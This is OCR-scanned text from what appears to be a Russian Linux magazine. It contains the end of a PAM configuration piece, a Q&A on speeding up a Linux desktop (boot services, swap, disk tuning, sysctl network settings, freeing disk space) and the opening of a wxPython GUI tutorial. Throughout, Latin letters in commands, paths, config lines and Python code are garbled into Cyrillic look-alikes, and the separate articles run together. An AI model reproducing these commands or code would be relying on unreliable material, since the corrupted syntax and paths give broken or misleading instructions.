раззѵюгб гедиігеб рат_сгаск1іЪ . зо ге!гу=3 тіпіеп=8 
бсгебі!=-2 исгебі!=-1 осгебі!=-1 1сгебі1=0 
раззілгогб гедиігеб рат_ипіх.зо изе_аи1ІШок 

Аргументы модуля говорят о следующем: длина пароля должна со- 
ставлять минимум 6 символов, из которых два должны быть числами, 
один — символом верхнего регистра и еще один — неалфавитным 
знаком (тире, например]. 

выводы 

Благодаря РАМ и большому количеству его сторонних модулей, 
жизнь пользователей, системных администраторов и создателей 
дистрибутивов стала намного проще. 

Практически для любой задачи, требующей аутентификации и 
настройки окружения пользователя, можно найти готовый модуль 
РАМ, а при необходимости — написать его самому (это просто). Для 
дальнейшего изучения рекомендую обратиться к страничке ѵѵѵѵѵѵ. 
кегпеІогд/риЬАіпихАіЬз/рат/тосІиІез.ЫтІ Она содержит ссылки на 
все доступные на данный момент модули РАМ, способные работать в 
связке с Ыпих-РАМ. т 
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САПОГИ-СКОРОХОДЫ 
ДЛЯ ТУКСА 

Меда РАО по разгону Ыпих на десктопе 



Прожорливость современных Ыпих-дистрибутивов легко ощутить, 
запустив один из них на компе с 512 Мб ОЗУ или купив АЗІІЗ ЕееРС. 
Нерасторопная загрузка десктопа, борьба приложений за ресурсы, 
тонущий под собственным весом Еігеіюх и постоянно шуршащий 
жесткий диск — зрелище пугающее и обескураживающее. Где же 
тот Ыпих, который способен работать на машинах с 16 Мб оператив- 
ки и процессором семейства І486? А ведь ондосихпортам, внутри, 
задавленный грузом многочисленных библиотек, бесполезных 
демонов, жирных приложений и красивостей рабочего стола. 



О. В моем любимом дистрибутиве 
Ыпих загружается огромное количество сер- 
висов. Это занимает кучу времени. Можно ли 
как-то ускорить за грузку? 

А. Ну, например, можно попытаться органи- 
зовать параллельный запуск сервисов. Это 
несложно, найди в файле /еіс/іпіГсІ/гс такой 

КОД: 



Дог і іп /еДс/гс$гип1еѵе1 . с1/8* 
сіо 

сазе "ргипіеѵеі" іп 

*) зДагДир $і зДагД ; ; 
езас 
сіопе 



И замени строку «*] зіагіир $і зіагі ;;» на 
«*] 5Да гІи р $і 5Да гі: & Так загрузочные 
процессы будут за пускаться параллельно: 
последующий сервис начнет стартовать, 
не дожидаясь выполнения предыдущего. 
После модификации конфига перезагрузи 
систему. Если тебе повезет, и Ыпих запустит- 
ся корректно, то время его запуска сокра- 
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ПРОГРАММАНАСТРОЙКИ СЕРВИСОВ ПРИ ИСПОЛЬЗОВАНИИ ІШТ-Ы6 



тится примерновдва раза. Ноон может и 
не загрузиться. У этого способа есть один 
недостаток. Представим, что нам нужно 
запустить 4 се рви са: А, В, СиО, причем сер- 
висе— довольно громоздкий, и его запуск 
занимает, скажем, секунд 15-20,асервисО 

— небольшой, ноон за висит от С. Получает- 
ся, что С еще не запущен, а 0 запущен, ноон 
не может работать без С. В результате, 0 ока- 
жется неработающим. В реальной системе 
таких сервисов может быть много. Что же де- 
лать? Ответ прост: нужно использовать про- 
грамму сіпіі, которая параллельно запускает 
сервисы, но при этом проверяет зависимос- 
ти. Таким образом, сіпіі не запустит сервис 
0, если сервис С, необходимый для коррект- 
ной работы 0, еще не запущен. Прочитать 

о правильной настройке сіпіі можно по 
адресу: пісо.зсМиеІіиз.огд/сІосиітіепіаГопз/ 
зреесЬез/теІагбеіптаіп-сбаозбаѵз-1 1 0б/ 
сіпіі/ѵіеѵѵ . Еще один вариант — перевести 
дистрибутив на систему инициализации 
ІпіШѲ (ІпТ Ыехі; ВепегаМп]. За подробнос- 
тями обращайся к статье «Молниеносная 
загрузка тукса» ш _03_2006]. 

К слову, убунтовский ирзіагі, использующий 
метод параллельного запуска сервисов, гру- 
зит дистрибутив до окна логина за —10 секунд. 

0. А как отключить ненужные сервисы? 

А. Отключить сервисы можно с по- 
мощью графического конфигуратора 
(бгакхзегѵісез в Мапбгіѵа, зузіет- 
сопбд-зегѵісез в Ребога, зегѵісез-абтіп 
в ІІЬипІи], но намного проще «прибить» 
ссылку в соответствующем гсЫ.б-каталоге 
(или же переместить ее в другой каталог 

— на случай, если когда-то понадобится 
включить сервис]. 



0. Какувеличить объем виртуальной памяти? 

А. Набери команду ітее в консоли. Сколько 
виртуальной памяти (физическая память плюс 
область подкачки) сейчас свободно? Если все 
заполнено, например, осталось несколько 
мегабайт физической памяти и столько же в 
своп-области, значит, памяти катастрофичес- 
ки не хватает. Лучший совет — это купить еще 
один модуль оперативки. В качестве вре- 
менного решения могу предложить создать и 
активировать дополнительный файл подкачки 
(в нашем случае его размер — 512 Мб): 

# (М і:Е=/с1еѵ/2его оІ= / зѵіар/ зѵі-іііе 

Ьз = 1к сошік = 524288 

# ткзмар /змар/зм-ііііе 524288 

# змароп /змар/зм-ііііе 

Чтобы последнюю команду не вводить каждый 
раз при запуске системы, пропиши ее в загру- 
зочных сценариях (желательно после команды 
«зѵѵароп -а»]. 

0. Как повысить производительность вирту- 
альной памяти? 

А. Если ты работаешь с небольшими програм- 
мами и часто переключаешься между ними, 
можно установить коэффициент подкачки 
равным 20 или 30. В этом случае переключе- 
ние между приложениями будет мгновенным, 
но замедлится их работа. Поскольку прило- 
жения небольшого размера, то это не будет 
заметно. 

Если же на протяжении дня ты в основном 
работаешь с громоздкими приложениями, 
например, ОрепОЛісе, или занимаешься 
обработкой изображений в 01МР, лучше 
установить значение коэффициента, пре- 
вышающее 70, например, 80 или даже 85. 



Тогда переключение между приложениями 
будет медленное, зато основное приложение 
будет работать быстро. Изменить значение 
коэффициента подкачки можно с помощью 
команды: 

# есТю "20" > /ргос/зуз/ѵш/ 
змарріпезз 

Или через /еІс/зузсД.сопГ 

ѵш. змарріпезз =20 

Поэкспериментируй с различными парамет- 
рами — только так можно подобрать для себя 
оптимальное значение. 

Крометого, не мешаетограничить размер 
файлового кэша, чтобы он занимал мень- 
ше ОЗУ (так мы предотвращаем свопинг], и 
активировать принудительный сброс буфера 
в случае, если приложения суммарно займут 
более половины памяти: 

ѵш.радесаске =90 
ѵш. сіігку_гакіо = 50 

0. Как оптимизировать работу жесткого 
диска? 

А. В большинстве случаев система сама 
подбираетоптимальные параметры работы с 
жестким диском. Используя утилиту Мрагт, 
есть возможность дополнительно повысить 
производительность. Чтобы получить инфор- 
мацию о текущих настройках харда, запустим 
команды: 

$ Мрагт /сіеѵ/зсіа 
$ Мрагт -і /сіеѵ/зсіа 

Параметров будет получено много, но на 
производительность напрямую влияютлишь 
некоторые: 

• МахМиНБесі/МиНБес* — максимальное/ 
текущее число секторов, которые диск может 
считатьза один проход (для максимальной 
производительности они должны совпадать]; 

• РІО тосіез/ОМАтосіез — режимы, которые 
поддерживает жесткий диск (режим, помечен- 
ный звездочкой, является текущим); 

• тиНсоипІ — число одновременно считывае- 
мых секторов; 

• І/Озиррогі — режим работы жесткого диска 
(1 6-битный режим, 32-битный режим или 32- 
битный синхронный режим); 

• изіпд_сІта — использовать ОМА или нет; 

• геасіаЬеасі — количество секторов для уп- 
реждающего чтения. 

Переопределитьустановки для конкретного 
диска можно в командной строке (вступают в 
силу немедленно] или —указав их в конфигу- 
рационном файле /еІс/Мрагт.сопІ или /еіе/ 
сіебаи и/ЬсІ рагт (потребуется перезагрузка]. 
Влияние изменений можно протестировать 
при помощи команды «Мрагт -ГГ /сіеѵ/зсіа». 
Для примера включим ОМА (-61 ], 32-битный 
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ПЛАНИРОВЩИКИ ВВОДА/ 
ВЫВОДАМ ПРОЦЕССОВ, 
РЕАЛТАЙМЯДРА 

Ядро Ііпих поддерживает несколько различных алгоритмов планировщиков ввода/вывода 
(І/О зсЬесіиІег) и процессов. Список І/О зсЬесіиІег можно получить, прочитав файл /§у§/ 
ЫоскДба/циеие/зсЬесШег: 
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поор апгіеірагогу сіеасіііпе [сіц] 



КОНФИГУРАТОР 

5Ѵ5ТЕМ-С0ЫРІѲ-5ЕРѴІСЕ5 



Алгоритм СРО (Сотріегеіу Раіг Оиеиіп§) , используемый по умолчанию в современных ядрах, 
идеально подходит для случаев, когда множество программ могут потребовать доступ к 
диску, а также для многопроцессорных систем, которым требуется сбалансированная работа 
І/О подсистемы с различными устройствами. При больших операциях считывания его мож- 
но переключить на ОеасШпе или Апнісіраногу: 

# есЬо апгіеірагогу > Дуз/ЫоскДда/циеие Дсйесіиіег 

Аналогична ситуация и с планировщиком процессов: здесь можно выбирать между старич- 
ком 0(1), СР5 (Сотріепеіу Раіг ЗсЬебиІег, абсолютно справедливый планировщик, включен в 
2.6.23) или другими планировщиками, но, правда, для этого придется пересобирать ядро. 
Подробнее о планировщиках читай в статье «Позови пингвина на планерку», опубликован- 
ной в :іс_12_2007. 



режим І/О (с 1 ) ; тиШсоипі выкручиваем по мак- 
симуму (-т64) , а упреждающее чтение ставим 
равным тиШсоипІ; (-а64). Установка параметра 
'-и 1 ’ разрешает драй веру параллельно обраба- 
тывать несколько прерываний, что повышает 
производительность: 

# Мрагт -и1с1с!1т64а64 /сіеѵ/зсіа 

Дополнительно можно поиграться с парамет- 
ром ‘-ѴѴ’ (0/1 ), отключающим/включающим 
кэширование. Его значение за висит от произ- 
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водителя и модели харда ипоумолчаниюне 
определено. 

0. Какзадать отдельной программе приори- 
тет для работы сдиском? 

А. Аналогично пісе, позволяющей изменить 
приоритет процесса, утилита іопісе задает 
приоритет на использование харда для 
процесса или приложения. В ІІЬипІи іопісе 
входит в пакет зсбесіибіз. Приоритетука- 
зывается при помощи класса и собственно 
приоритета в виде: 

іопісе -с класс -п приоритет -р РІБ 

Приоритет— число отО до 7 (чем меньше число, 
тем он выше). В позиции класс три значения: 

1. Реаіііте — планировщикдаетпреимущест- 
во при доступе кдиску выбранному процессу, 
без внимания на работу других процессов (8 
уровней приоритета [0-7]); 

2. Везі ЕНогІ — класс, устанавливаемый по 
умолчанию для всех процессов (8уровней 
приоритета); 

3. ІсІІе — программа получаетправо на исполь- 
зование жесткого диска только в том случае, 
если другая программа не требует диск; при- 
оритеты не задаются. 

Вместо РЮ можно указать имя процесса: 

$ зибо іопісе -с2 -пО тріауег 

0. Как разогнать файловую систему? 

А. Через отключение ненужной функциональ- 
ности. Любая современная ФС достаточно 
гибка, но напичкана большим количеством 
функций, которые личнотебе могути не пона- 
добиться. Возьмем, к примеру, ехіЗ, наиболее 
популярную сегодня І_іпих-ФС. Она обладает 
двумя важными, но далеко не всегда необ- 
ходимыми функциями:журналирование и 
временные метки последнего доступа к файлу. 
Обе они требуются, но только в случае, если твоя 
система целиком «сидит» на одном разделе. 
Если же установить ОС на несколько разде- 
лов, каждый из которых будет ответственен за 
хранение файлов конкретного каталога, — мы 
получим возможность использовать для них 
разные файловые системы с различным уров- 
нем функциональности. Смотри: 

• Раздел #1 . Корень файловой системы, то есть 
каталог/. 

• Раздел #2. Каталог/изг, хранящий все уста- 
навливаемое программное обеспечение. 

• Раздел #3. Каталог/Ьоте, личные данные 
пользователей. 

• Раздел #4. КаталогДтр, временные файлы. 

• Раздел #5. Каталог/ѵаг, множество изменяе- 
мых во времени данных приложений. 

Зачем журналировать и обновлять время 
последнего обращения кфайлам для корня 
файловой системы, который изменяется очень 
редко (обычно во время переустановки ядра 
или обновления дистрибутива)? Ответ: незачем. 
Монтируем к корню шуструю ехі2 (которая не 
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ведетжурнал) с опцией поабте (не использо- 
вать временные метки последнего доступа). То 
же относится к каталогу Дтр, за исключением 
того, что в этом случае абте лучше оставить. 
Каталог/ѵаг хранит множество мелких файлов, 
для управления которыми отлично подходит 
РеізегРЗ./Ьоте — важнейшие данные поль- 
зователя, поэтому к нему лучше подключить 
журналируемую ФС. 

Кстати, для ускорения доступа к каталогу Атр 
можно использовать файловую систему ітрі'з, 
хранящую все свои файлы в оперативной 
памяти. Это отличное подспорье тогда, когда 
памяти много, а девать ее некуда. Вот строка 
дляМсЛзФЬ: 

Сшріз /Стр Стріз зІ2е=512т,тос1е=1777 

0 0 

Можно пойти и радикальным путем: не раз- 
бивать диск на множество разделов, а просто 
перейти на файловую систему ех{4. В июльском 
номере журнала, в статье «На пути к совер- 
шенству», мы много говорили о ней и показали 
бенчмарки, которые доказывают, что произво- 
дительность ехі4 за последнее время возросла 
настолько, что другие ФС на ее фоне выглядят 
поделками второкурсников. 

0. Что можно сделать с видеоподсистемой? 

А. Первое — отказаться от использования 
стандартных видеодрайверов, поставляемых в 
комплекте с Х.огд. Особенно ущербны драй- 
вера для карточек АТІ и пѴісІіа, и если первые 
способны хотя бы на что-то в плане 20-ускоре- 
ния (во многом благодаря открытию некоторых 
спецификаций), то вторые — просто ужасны. 

Я на собственной шкуре ощутил примитивизм 
драйвера пѵ, когда попытался поиграться с 
КОЕ 4.1.1. По уровню тормознутости картинка 
легко обставляла ЮТ, запущенный на 166’ом 



пентиуме (тожеличный опыт), и это несмотря 
на 1 Гб оперативки, 2. 6-ги га герцовый камень 
и полностью отключенные эффекты. После 
установки официальныхдров кеды полетели 
быстрее ХЕСЕ. Ответ на вопрос «почему?» легко 
найти, прочитав документацию к пѵ, которая 
прямо говорито полном отсутствии функций 
20-ускорения (именно20) вдрайвере. 

Второе, что можно сделать — установить про- 
стую утилиту пѵсіоск ( ѵѵѵѵѵѵ.ііпихбагсіѵѵаге.огд/ 
пѵсіоск ). которая позволит разогнать видеокар- 
ту какпо частоте видеочипа, таки по памяти. На 
моем домашнем компеустановлена старенькая 
видеокарта пѴісІіа 5900ЕХ. Когда-то давно я 
запускал на ней первый ЕагСгу (через ѵѵіпе). 
Поначалу он притормаживал даже на средних 
настройках графики, но после выполнения 
команды «пѵсіоск -і -п 540», которая увеличи- 
ла частоту чипа сдефолтовых400 МГц до 540, 
игрушка начала без проблем бегать на высоких 
настройках. 

Третье — отключить ЗЭ-эффекты рабочего 
стола. Операция, которая не несетособого при- 
роста производительности (эффекты не грузят 
проц, а для ЗЭ-ускорителя это просто семечки), 
может повысить скорость реакции системы за 
счетснижения времени на исполнение допол- 
нительного кода и количества переключений 
контекста. 

0. Какотключить СотрІ 2 ? 

А. Всезависитоттвоего дистрибутива. На- 
пример, в ІІЬипІи нужно выполнить команду 
«Система Параметры -> Внешний вид» и на 
вкладке «Внешний вид» отключить эффекты 
рабочего стола. В других дистрибутивах можно 
использовать универсальные команды: 

# дбк-міпбсж-сіесогаііог --геріасе 

(если у тебя СЖ)МЕ) 

# кбе-міпботл-сіесогаког --геріасе 
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УПРАВЛЕНИЕ ЗАГРУЗКОЙ СЕРВИСОВ В УВУЫТи 



(если у тебя КБЕ) 

0. Можно ли как-то использовать ресурсы 
видеоадаптера во время его простоя? 

А. Да, можно. АТІ и пѴісІіа, два основных игрока 
на рынке видеоадаптеров, нетакдавно выпус- 
тили специальные фрейм ворки, позволяющие 
перенести некоторые прожорливые вычисли- 
тельные задачи на ОРІФ. Позднее была сфор- 
мирована специальная группа КЬгопоз Огоир, 
разработавшая стандарт 0 реп С І_ [ ѵѵѵѵѵѵ.кіігопоз. 
огд/орепсі ). который описывает стандартизо- 
ванный интерфейсдоступа кОРБ для вычис- 
лительныхзадач. Беда втом, что пока почти 
не существует приложений, использующих эту 
технологию. А вотзадействовать установлен- 
ную на видеоадаптер высокоскоростную память 
удастся прямо сейчас. Ядро Шлих включает в 
себя специальный драйвер Метогу Тесбпоіоду 



Беѵісе (МТО), который позволяетадресовать не 
только оперативную память, но и память любого 
устройства, подключенного через шину РСІ. Ме- 
тодика, описанная в статье еп.депіоо-уѵікі.сот/ 
ѵѵікі/ТІР Узе тетогѵ оп ѵібео сагсі аз зѵѵар . 
использует этот драйвер для создания (псевдо) 
блочного устройства, которое будет исполь- 
зовать видеопамять в качестве хранилища 
данных. На устройстве можно создать своп 
или файловую систему для хранения файлов, 
например, каталога Дтр. Интересная особен- 
ность: подход отнюдь не отменяет возможности 
использования графических приложений, 
позволяя зарезервировать небольшой кусочек 
памяти для ѴСА-режима. 

0. Интернет-соединение тормозит, периоди- 
чески появляются раздражающие задержки. 
Как исправить? 



А. Это известная проблема в некоторых дист- 
рибутивах Біпихс включенной поумолчанию 
поддержкой ІРѵб. Если поддержка новой версии 
протокола ІР в системе не нужна, ее очень прос- 
то отключить. Для этого достаточно закоммен- 
тировать строку, содержащую «ірѵб», в конфиге 
Мс/тобргоЬе.сопб или занести этот модуль 
в блэклист, добавив в файл /еІс/тосІргоЬе.сІ/ 
ЫаскІізЕІосаІ запись «Ыаскіізі: ірѵб». 

Если проблема не решена, следует вклю- 
чить/отключить параметр ТС Р ѵѵі п сі оѵѵ 
зсаііпд, определяющий масштабирование 
ТСР-окна, то есть установку количества 
пакетов, которое может быть послано без 
подтверждений. Временно отключить его 
можно командой: 

# зузсбі -ѵі пеб . ірѵ4 . Сср_ѵФпс1сж_ 

зса1іпд=0 
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Если это поможет, заносим следующую строчку 
вМс/зузсПсопЕ 

пеС . ірѵ4 . Сср_ѵ\гіпс1оѵ\г_зса1іпд=0 

Другой вариант— не отключать «ТОР ѵѵіпсіоѵѵ 
зсаііпд», а попробовать подобратьоптимальные 
параметры для ТСР-буфера чтения и записи: 

пеС . ірѵ4 . Рср_гшеш = 4096 87380 
174760 

пеС . ірѵ4 . Сср_шпет = 4096 87380 
174760 

Аналогичный параметр есть и для ІЮР: 

пеС . ірѵ4 . ийр_гтет_тіп = 16384 
пеС . ірѵ4 . ис!р_ѵтпет_тіп = 163 84 
пеС . ірѵ4 . ис!р_тет = 8388608 12582912 
16777216 

Ядро Ыпих2.6 включаеталгоритмы автомати- 
ческой оптимизации буферов принимающей 
и отправляющей сторон, которыми управляют 
еще три параметра: 

пеС . ірѵ4 . Сср_по_теСгісз_заѵе = 1 
пеС . ірѵ4 . Рср_тосіегаЬе_гсѵЬиЕ = 1 
пеС . соге . пеС<іеѵ_тах_Ьаск1од = 2 500 

Вообще, список всех доступных параметров 
можно получить при помощи такой конструк- 
ции: «зузсД -а I дгер Іср». 

В быстрых сетях имеетсмысл поэксперимен- 
тировать с размером очереди интерфейса. За 
ее установку отвечает параметр іхдиеиеіеп 
команды ііюопбд: 

# іісопіід еСЬ.0 Схдиеиеіеп 1000 

Начиная сядра 2.6.7, появилисьальтерна- 
ти вн ые тради цион ному «гепо» алгоритмы 
обработки перегрузки (потери пакета в канале]. 
Получить полный ихсписокможно, введя: 

# зузсСІ пек . ірѵ4 . Сср_аѵаі1аЫе_ 
сопдезСіоп_сопЦго1 

В зависимости от дистрибутива и версии ядра, 
в ответ получим разный список. Последние 
релизы могут содержать 6 возможных вари- 
антов: гепо, сибіс, Ьіс, біср, ѵедаз и ѵѵезЕл/оосІ. 

В первую очередь, рекомендую попробовать 
си Ьіс или біср, — они считаются наиболее 
эффективными. Для перегруженных сетей, в 
которых теряется большое количество пакетов, 
попробуй ѵѵезЕл/оосІ. 

Задается алгоритм просто: 

зузсСІ -ѵг пек . ірѵ4 . кср_сопдезкіоп_ 
сопкго1=1ікср 

0. Как отключить ежечасные и ежедневные 
задачи? 

А. Почти во всехдистрибутивах присутствуют 



четыре специальные задачи демона стоп, 
которые поочередно запускают все скрипты, 
расположенные в каталогах /еі: с/с гоп. бои гіу 
(ежечасно), Мс/сгоп.сіаііу (ежедневно], Мс/ 
сгоп.ѵѵеекіу (еженедельно) и/еіс/сгоп.топібіу 
(ежемесячно]. Обычно они не создаютособой 
нагрузки на систему, но иногда в первый из этих 
ката л о го в п о п а да ют п р ожо р л и в ы е с кр и пты , 
которые будут притормаживать систему каж- 
дый час. Для решения проблемы достаточно 
подчистить каталогМс/сгоп.боигІу (имена 
скриптов обычно весьма многословны]. 

0. Можно ли сжать модули ядра для экономии 
места? 

А. Да, конечно! Для этого можно использовать 
сценарий тсотргезз, приведенный ниже: 

# ! /Ып/зЬ 
ѴЕК= ' шіате -г' 

МАЦ=' шіате -г | аѵік -Р. ' {ргіпк $1} 1 ' 
МІН=' шіате -г | аѵкк -Р. 1 {ргіпк $2} 1 ' 
ік [ $МАЦ -де 2 -а $МШ -де 5 ] ; ккеп 
ОВЦ=ко 
еізе 
ОВЦ=о 
кі 

кіпсі /1іЬ/то<іи1ез/ ’ ипате -г’ / -пате 
* . $ОВЦ -ехес дгір -9 1 { } 1 1 ; 1 
сіертосі -а; сіертосі -А 

0. Как освободить дополнительное место на 
диске? 

А. Основной метод экономии места — это удале- 
ние ненужных пакетов. Кпримеру: 

• хзапе, запе-иШз, ІіЬзапе, ІюотаІіс-сІЬ-ЬрУз, 
Ьрцз, Ьріір — поддержка сканеров и некоторых 
МФУ от НР (если утебя нетсканера или прин- 
тера НР, или даже если естьтолько принтер, 
но нетсканера, то можноудалить первыетри 
пакета]; 

• ѵѵЗт — текстовый браузер (когда ты в послед- 
ний раз им пользовался, не помнишь? Воти я 
тоже] ; 

• ЬодобНег, ЬодоЛ11ег-{ЬбЬ,соттоп} — спам- 
фил ьтр ; 

• зрііх — драйвердля принтера Затзипд 
5РЕ2 (у меня Еехтагк, мне драйвер от5РЕ2 не 
нужен); 

• дисЬагтар — таблица символов; 

• опЬоагсі — экранная клавиатура; 

• гзз-діх — набор скринсейверов. 

Этот список можно продолжать очень дол- 
го. Затем нужно пройтись по шрифтам. По 
умолчаниюустановлено огромное количество 
фонтов, которые занимают достаточно места 
и при этом практически никогда не использу- 
ются. Например, пакеты шрифтов ИЬагаЬеуез, 
ШЧао, Ш-агрбіс-итіпд, Ш-загатапі*, Ш-іпсІіс*, 
Ш-ипФпІз-соге, ШЧЬаі* можно смело удалять. 
После этой операции моя система полегчала 
примерно на 80 Мб. 

Особого внимания заслуживают пакеты с 
документацией. Обычно их нельзя удалить без 
удаления основного пакета. Но документация 



нужна далеко не всегда. Частоты читал доку- 
ментацию по тому же ОрепОШсе или 01 МР? Тем 
более, бывает, что для одного итого же продукта 
установлено два пакета с документацией — на 
русском и английском. Удалить хотя бы один 
пакетнельзя, иначе будетв лучшем случаеуда- 
лен и второй, в худшем — весь продукт. Кроме 
того, все пакеты справки содержат файлы вроде 
РЕАОМЕ, СНАЫ0Е5, 0РЕ, ЕІСЕЫЗЕ, АІІТН0Р5, 
СбапдеЕод и т.д. В итоге, утебя на винте скапли- 
вается огромное количество копий этих файлов! 
Сэкономить место довольно просто. Заходи 
в/изг/збаге/бос и удаляй все, что видишь. 

Не беспокойся, даже если тебе понадобится 
документация для какого-то пакета, достаточно 
переустановитьлибо сам пакет, либо пакете 
документацией. В моей системе документация 
занимала 250 Мб. 

0. Существуют ли более хардкорные методы 
оптимизации? 

А. Да, но мы не рекомендуем применять их на 
практике. 

Метод гентушников. Старый добрый способ 
оптимизации через сборку всего и вся с привяз- 
кой к конкретному семейству процессоров и за- 
действованием жестких флагов оптимизации. 
Поэтому, если ты замыслил получить прирост 
производительности в 3-5%, устанавливай 
СепФо со 5Еаде 1 и запоминай следующую 
комбинацию флагов оптимизации: 

• 02 — задействовать все «легальные» методы 
оптимизации. 

• к>тіЫгате-роіпІег — не сохранятьуказатель 
на кадр стека. 

• {ипгоіі-іоорз — разворачивать циклы. 

• тсри=семейство_процессоров — подгон ре- 
зультирующего кода под конкретный процессор. 

• тагсб=семейство_процессоров — предыду- 
щая опция + использование инструкций этого 
семейства процессоров. 

• ріре — не использовать временные файлы 
(ускоряет компиляцию). 

Возможныезначения опций ‘-тори’ и ‘-тагсб’ 
смотри здесь: дсс.дпи.огд/опІіпебосз/дсс/і386- 
апб-х86_002б64-0рбопз.б1:пп1. 

Метод ниндзя. Удаляем все оконные среды 
и менеджеры окон, избавляемся отіюіют, 
атагок, кЗЬ, бгеіюх, ІбипсІегЬі гсі и прочихособо 
жадныхдо ресурсов приложений. Ставимта- 
бовый менеджер окон ѵѵтіі, іопЗ или аѵѵезоте, 
тс в качестве навигатора, 1іпкз2, біііо или 
текстовый еііпкздля навигации поѵѵеб, тиИ 
для чтения почты, зпоѵѵпеѵѵз для П55, зопаФ 
+ трб для музыки, тріауегдля видео. После 
этого запасаемся едой и закрываемся на три 
дня в комнате, втечение которых проникаемся 
дзен и настраиваем все это хозяйство. Через 
две недели становимся свободными от мышки и 
весьма продуктивными людьми. 

Метод отцов. Включает в себя все процедуры 
предыдущего пункта с постепенным переходом 
на консольные приложения, последующим 
погружением в консоль и познанием сущности 
зсгеепЛтих. т 
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/5НРАК.ѴА0ІМгаСМАІІ_.С0М/ 

" 6111 РѴТНОІМ'У! 



Вкуриваем в кодинг графических интерфейсов на питоне 



Пользователь судит о программе в первую очередь потому, насколь- 
ко с ней удобно и понятно работать. Поэтому в хорошей программе 
необходимоуделить немалое внимание разработке пользователь- 
і — і ского интерфейса. В этой статье мы рассмотрим азы написания 6111 
ь++ на языке Руібоп. 
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сілврѵтном'е 

Практически любой серьезный языкпрограммирования имеетсредства 
для написания 6111. Руібоп — не исключение. Но разработка 6111 на нем 
имеетдва преимущества. Во-первых, это высокая скорость разработки, 
что и следовало ожидать оттакого языка как Руібоп. Во-вторых, — огром- 
ное количество 6111-фреймворков. буществуют расширения для почти 
всех основных 6111-библиотек: Ткіпіегна основе Тсі/Тк, ѵѵхРуѣЬоп для 
ѵѵхѴѴісІдеІБ, РуСкдля СИ: и многое другое (с полным списком можно по- 
знакомиться, пройдя по ссылке на боковом выносе]. Ткіпіег поставляется 
вместе с Руібоп, и работу с 6Ш можно начинать сразу после его установки. 
В этой статье будет рассматриваться библиотека ѵѵхРуіЬоп. бна явля- 
ется оберткой над популярной кроссплатформенной 6111-библиотекой 
ѵѵхѴѴіпбоѵѵз. 

ВЫБИРАЕМ ШЕ 

По ссылке на боковом выносе можно выбрать подходящий ЮЕ, заточен- 
ный для работы с 6111. Выбор весьма богат, такчто, скорее всего, ты не 
разочаруешься. Кпримеру, для работы именно с ѵѵхРуіЬоп мне пригля- 
нулся ВоаСопБІгисІог. 6н удобен для визуального проектирования 6111: 
избавляет от рутины и, в целом, имеет интуитивно понятный интерфейс 
(что не отменяет чтения туториала]. Какой ЮЕ выбрать — это дело вкуса, 
поэтому я больше не буду акцентировать на нем внимание. Дальнейшее 
чтение статьи должно быть понятным независимо от сделанного выбора. 
Так что устанавливай ѵѵхРуіЬоп и приступим непосредственно к кодингу. 

НЕІ_І_0,ѴѴ0КІ_0! 

Немного перефразирую известную фразу: лучший способ изучить работу 
с 6Ш — это сразу начать писать 6111! Не откладывая дело в долгий ящик, 
сразу продемонстрирую программу « Неііо, ѵѵогісі !» на ѵѵхРуіЬоп’е. 

Ішрогд Ѵ7Х 

сіазз НеІІоРгате (ѵ/х. Ргате) : 
сіе!: іпіД (зеІТ) : 

ѵтх . Ргате . іпід (зеИ, ісІ=-1, рагепк=РГопе, 

роз=ѵгх . РоіпД ( 422 , 270), зіге= 
ѵтх. Зіге (3 00 , 200), ЦіДІе=' Неііо Ргате' ) 
зеіі. рапеі = ѵгх. Рапеі (зеіі) 
зеіі .ЬеІІоВиккоп = ѵгх. ВиДДоп ( ісЗ.= — 1 , 1аЬе1= 

'РизЪ. те. ' ,рагепк = зе1:Е. рапеі. 



роз=ѵгх. РоіпД (110 , 75), зІ 2 е=ѵгх . Зізе ( 80 , 30)) 
зеіі .рапеі . Віпсі (ѵгх. РѴТ_ВІІТТОЫ, 
зеіі . ОпВиДДопСІіск, зеіі .ЬеНоВиккоп) 

сіе! ОпВиккопСІіск (зеіі , еѵепк) : 
ргіпк 'Неііо, тлгогісі! ' 

сіазз НеІІоАрр (ѵтх. Арр) : 
сіеі Опіпік (зеіі) : 

Ігате = НеІІоРгате () 

1 г ате . ЗТюѵг ( Тгие ) 
гекигп Тгие 

іі пате == ' таіп ' : 

арр = НеІІоАрр () 
арр .МаіпЬоор ( ) 

При запуске программы создается окно с кнопкой, при нажатии на кото- 
рую выводится строка «Неііо, ѵѵогісі!». 

ЧТО ПРОИСХОДИТ «ЗА КУЛИСАМИ»? 

Теперь немного теории. Любая ѵѵхРуіЬоп-программа должна содержать 
два объекта: прикладной объект и главное окно. Прикладной объект 
управляет главным циклом обработки событий, а окно содержит элементы 
интерфейса, посредством которых пользователь может управлять данны- 
ми. Разберемжизненный цикл нашей программы: 

1) арр = \л/х.Ру5ітрІеАрр() — создается прикладной объект, который должен 
быть объектом класса ѵѵх.Арр или производного от него. Пока он не создан, 
невозможно создать никакие другие графические объекты ѵѵхРуіЬоп. 

2) Вызов метода ОпІпіШ для созданного прикладного объекта, ббычно 
здесь выполняется начальная инициализация виджетов. Если он воз- 
вратит Еаізе.то приложениетутже завершится. 

3) ітате = НеІІоЕгатеО — создание объекта главного окна (должен быть 
объектом класса ѵѵх. Ргате или производного отнего]. Причем, необя- 
зательно, чтобы создание этого объекта происходило в методе ОпІпіШ 
прикладного объекта — лишь бы главное окно создалось не раньше, чем 
прикладной объект! Приложение может соде ржать несколько окон верхне- 
го уровня (не имеющих родителя], итолько одно из нихявляется главным. 
Главноеокно можно объявитьявно (вызвав метод ЗеПорѴѴіпсІоѵѵО) либо не- 
явно (главным считается фрейм верхнего уровня, который создан первым]. 
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4 ) арр.МаіпІ_оор() — вызов главного цикла обработки событий. Этот цикл 
отвечает на события, посылая их соответствующим обработчикам (ксо- 
бытиям я подробнее вернусь чуть позже]. Когда все окна верхнего уровня 
закрываются, то происходит возврат из метода Маіп1_оор() и приложение 
завершает работу. Также как метод ОпІпіШ вызывается сразу после созда- 
ния прикладного объекта, метод ОпЕхіШ у этого объекта вызывается после 
закрытия последнего окна, но перед внутренней очисткой ѵѵхРуіЬоп. Его 
можно использовать для очистки не-ѵѵхРуІбоп ресурсов. Если по каким-то 
причинам приложение должножить даже после закрытия всех окон, 
можно изменить поведение прикладного объекта, вызвав у него метод 
ЭеіЕхіЮпЕгаппеОеІеЫЕаІзе]. После этого приложение будет жить до тех 
пор, пока явно не вызовет глобальную функцию ѵѵх.ЕхіШ. Ты получил общее 
представление отом, что происходит «за кулисами». Можно перейти к 
созданию виджетов, которым будет посвящена оставшаяся часть статьи. 

ВИДЖЕТЫ 

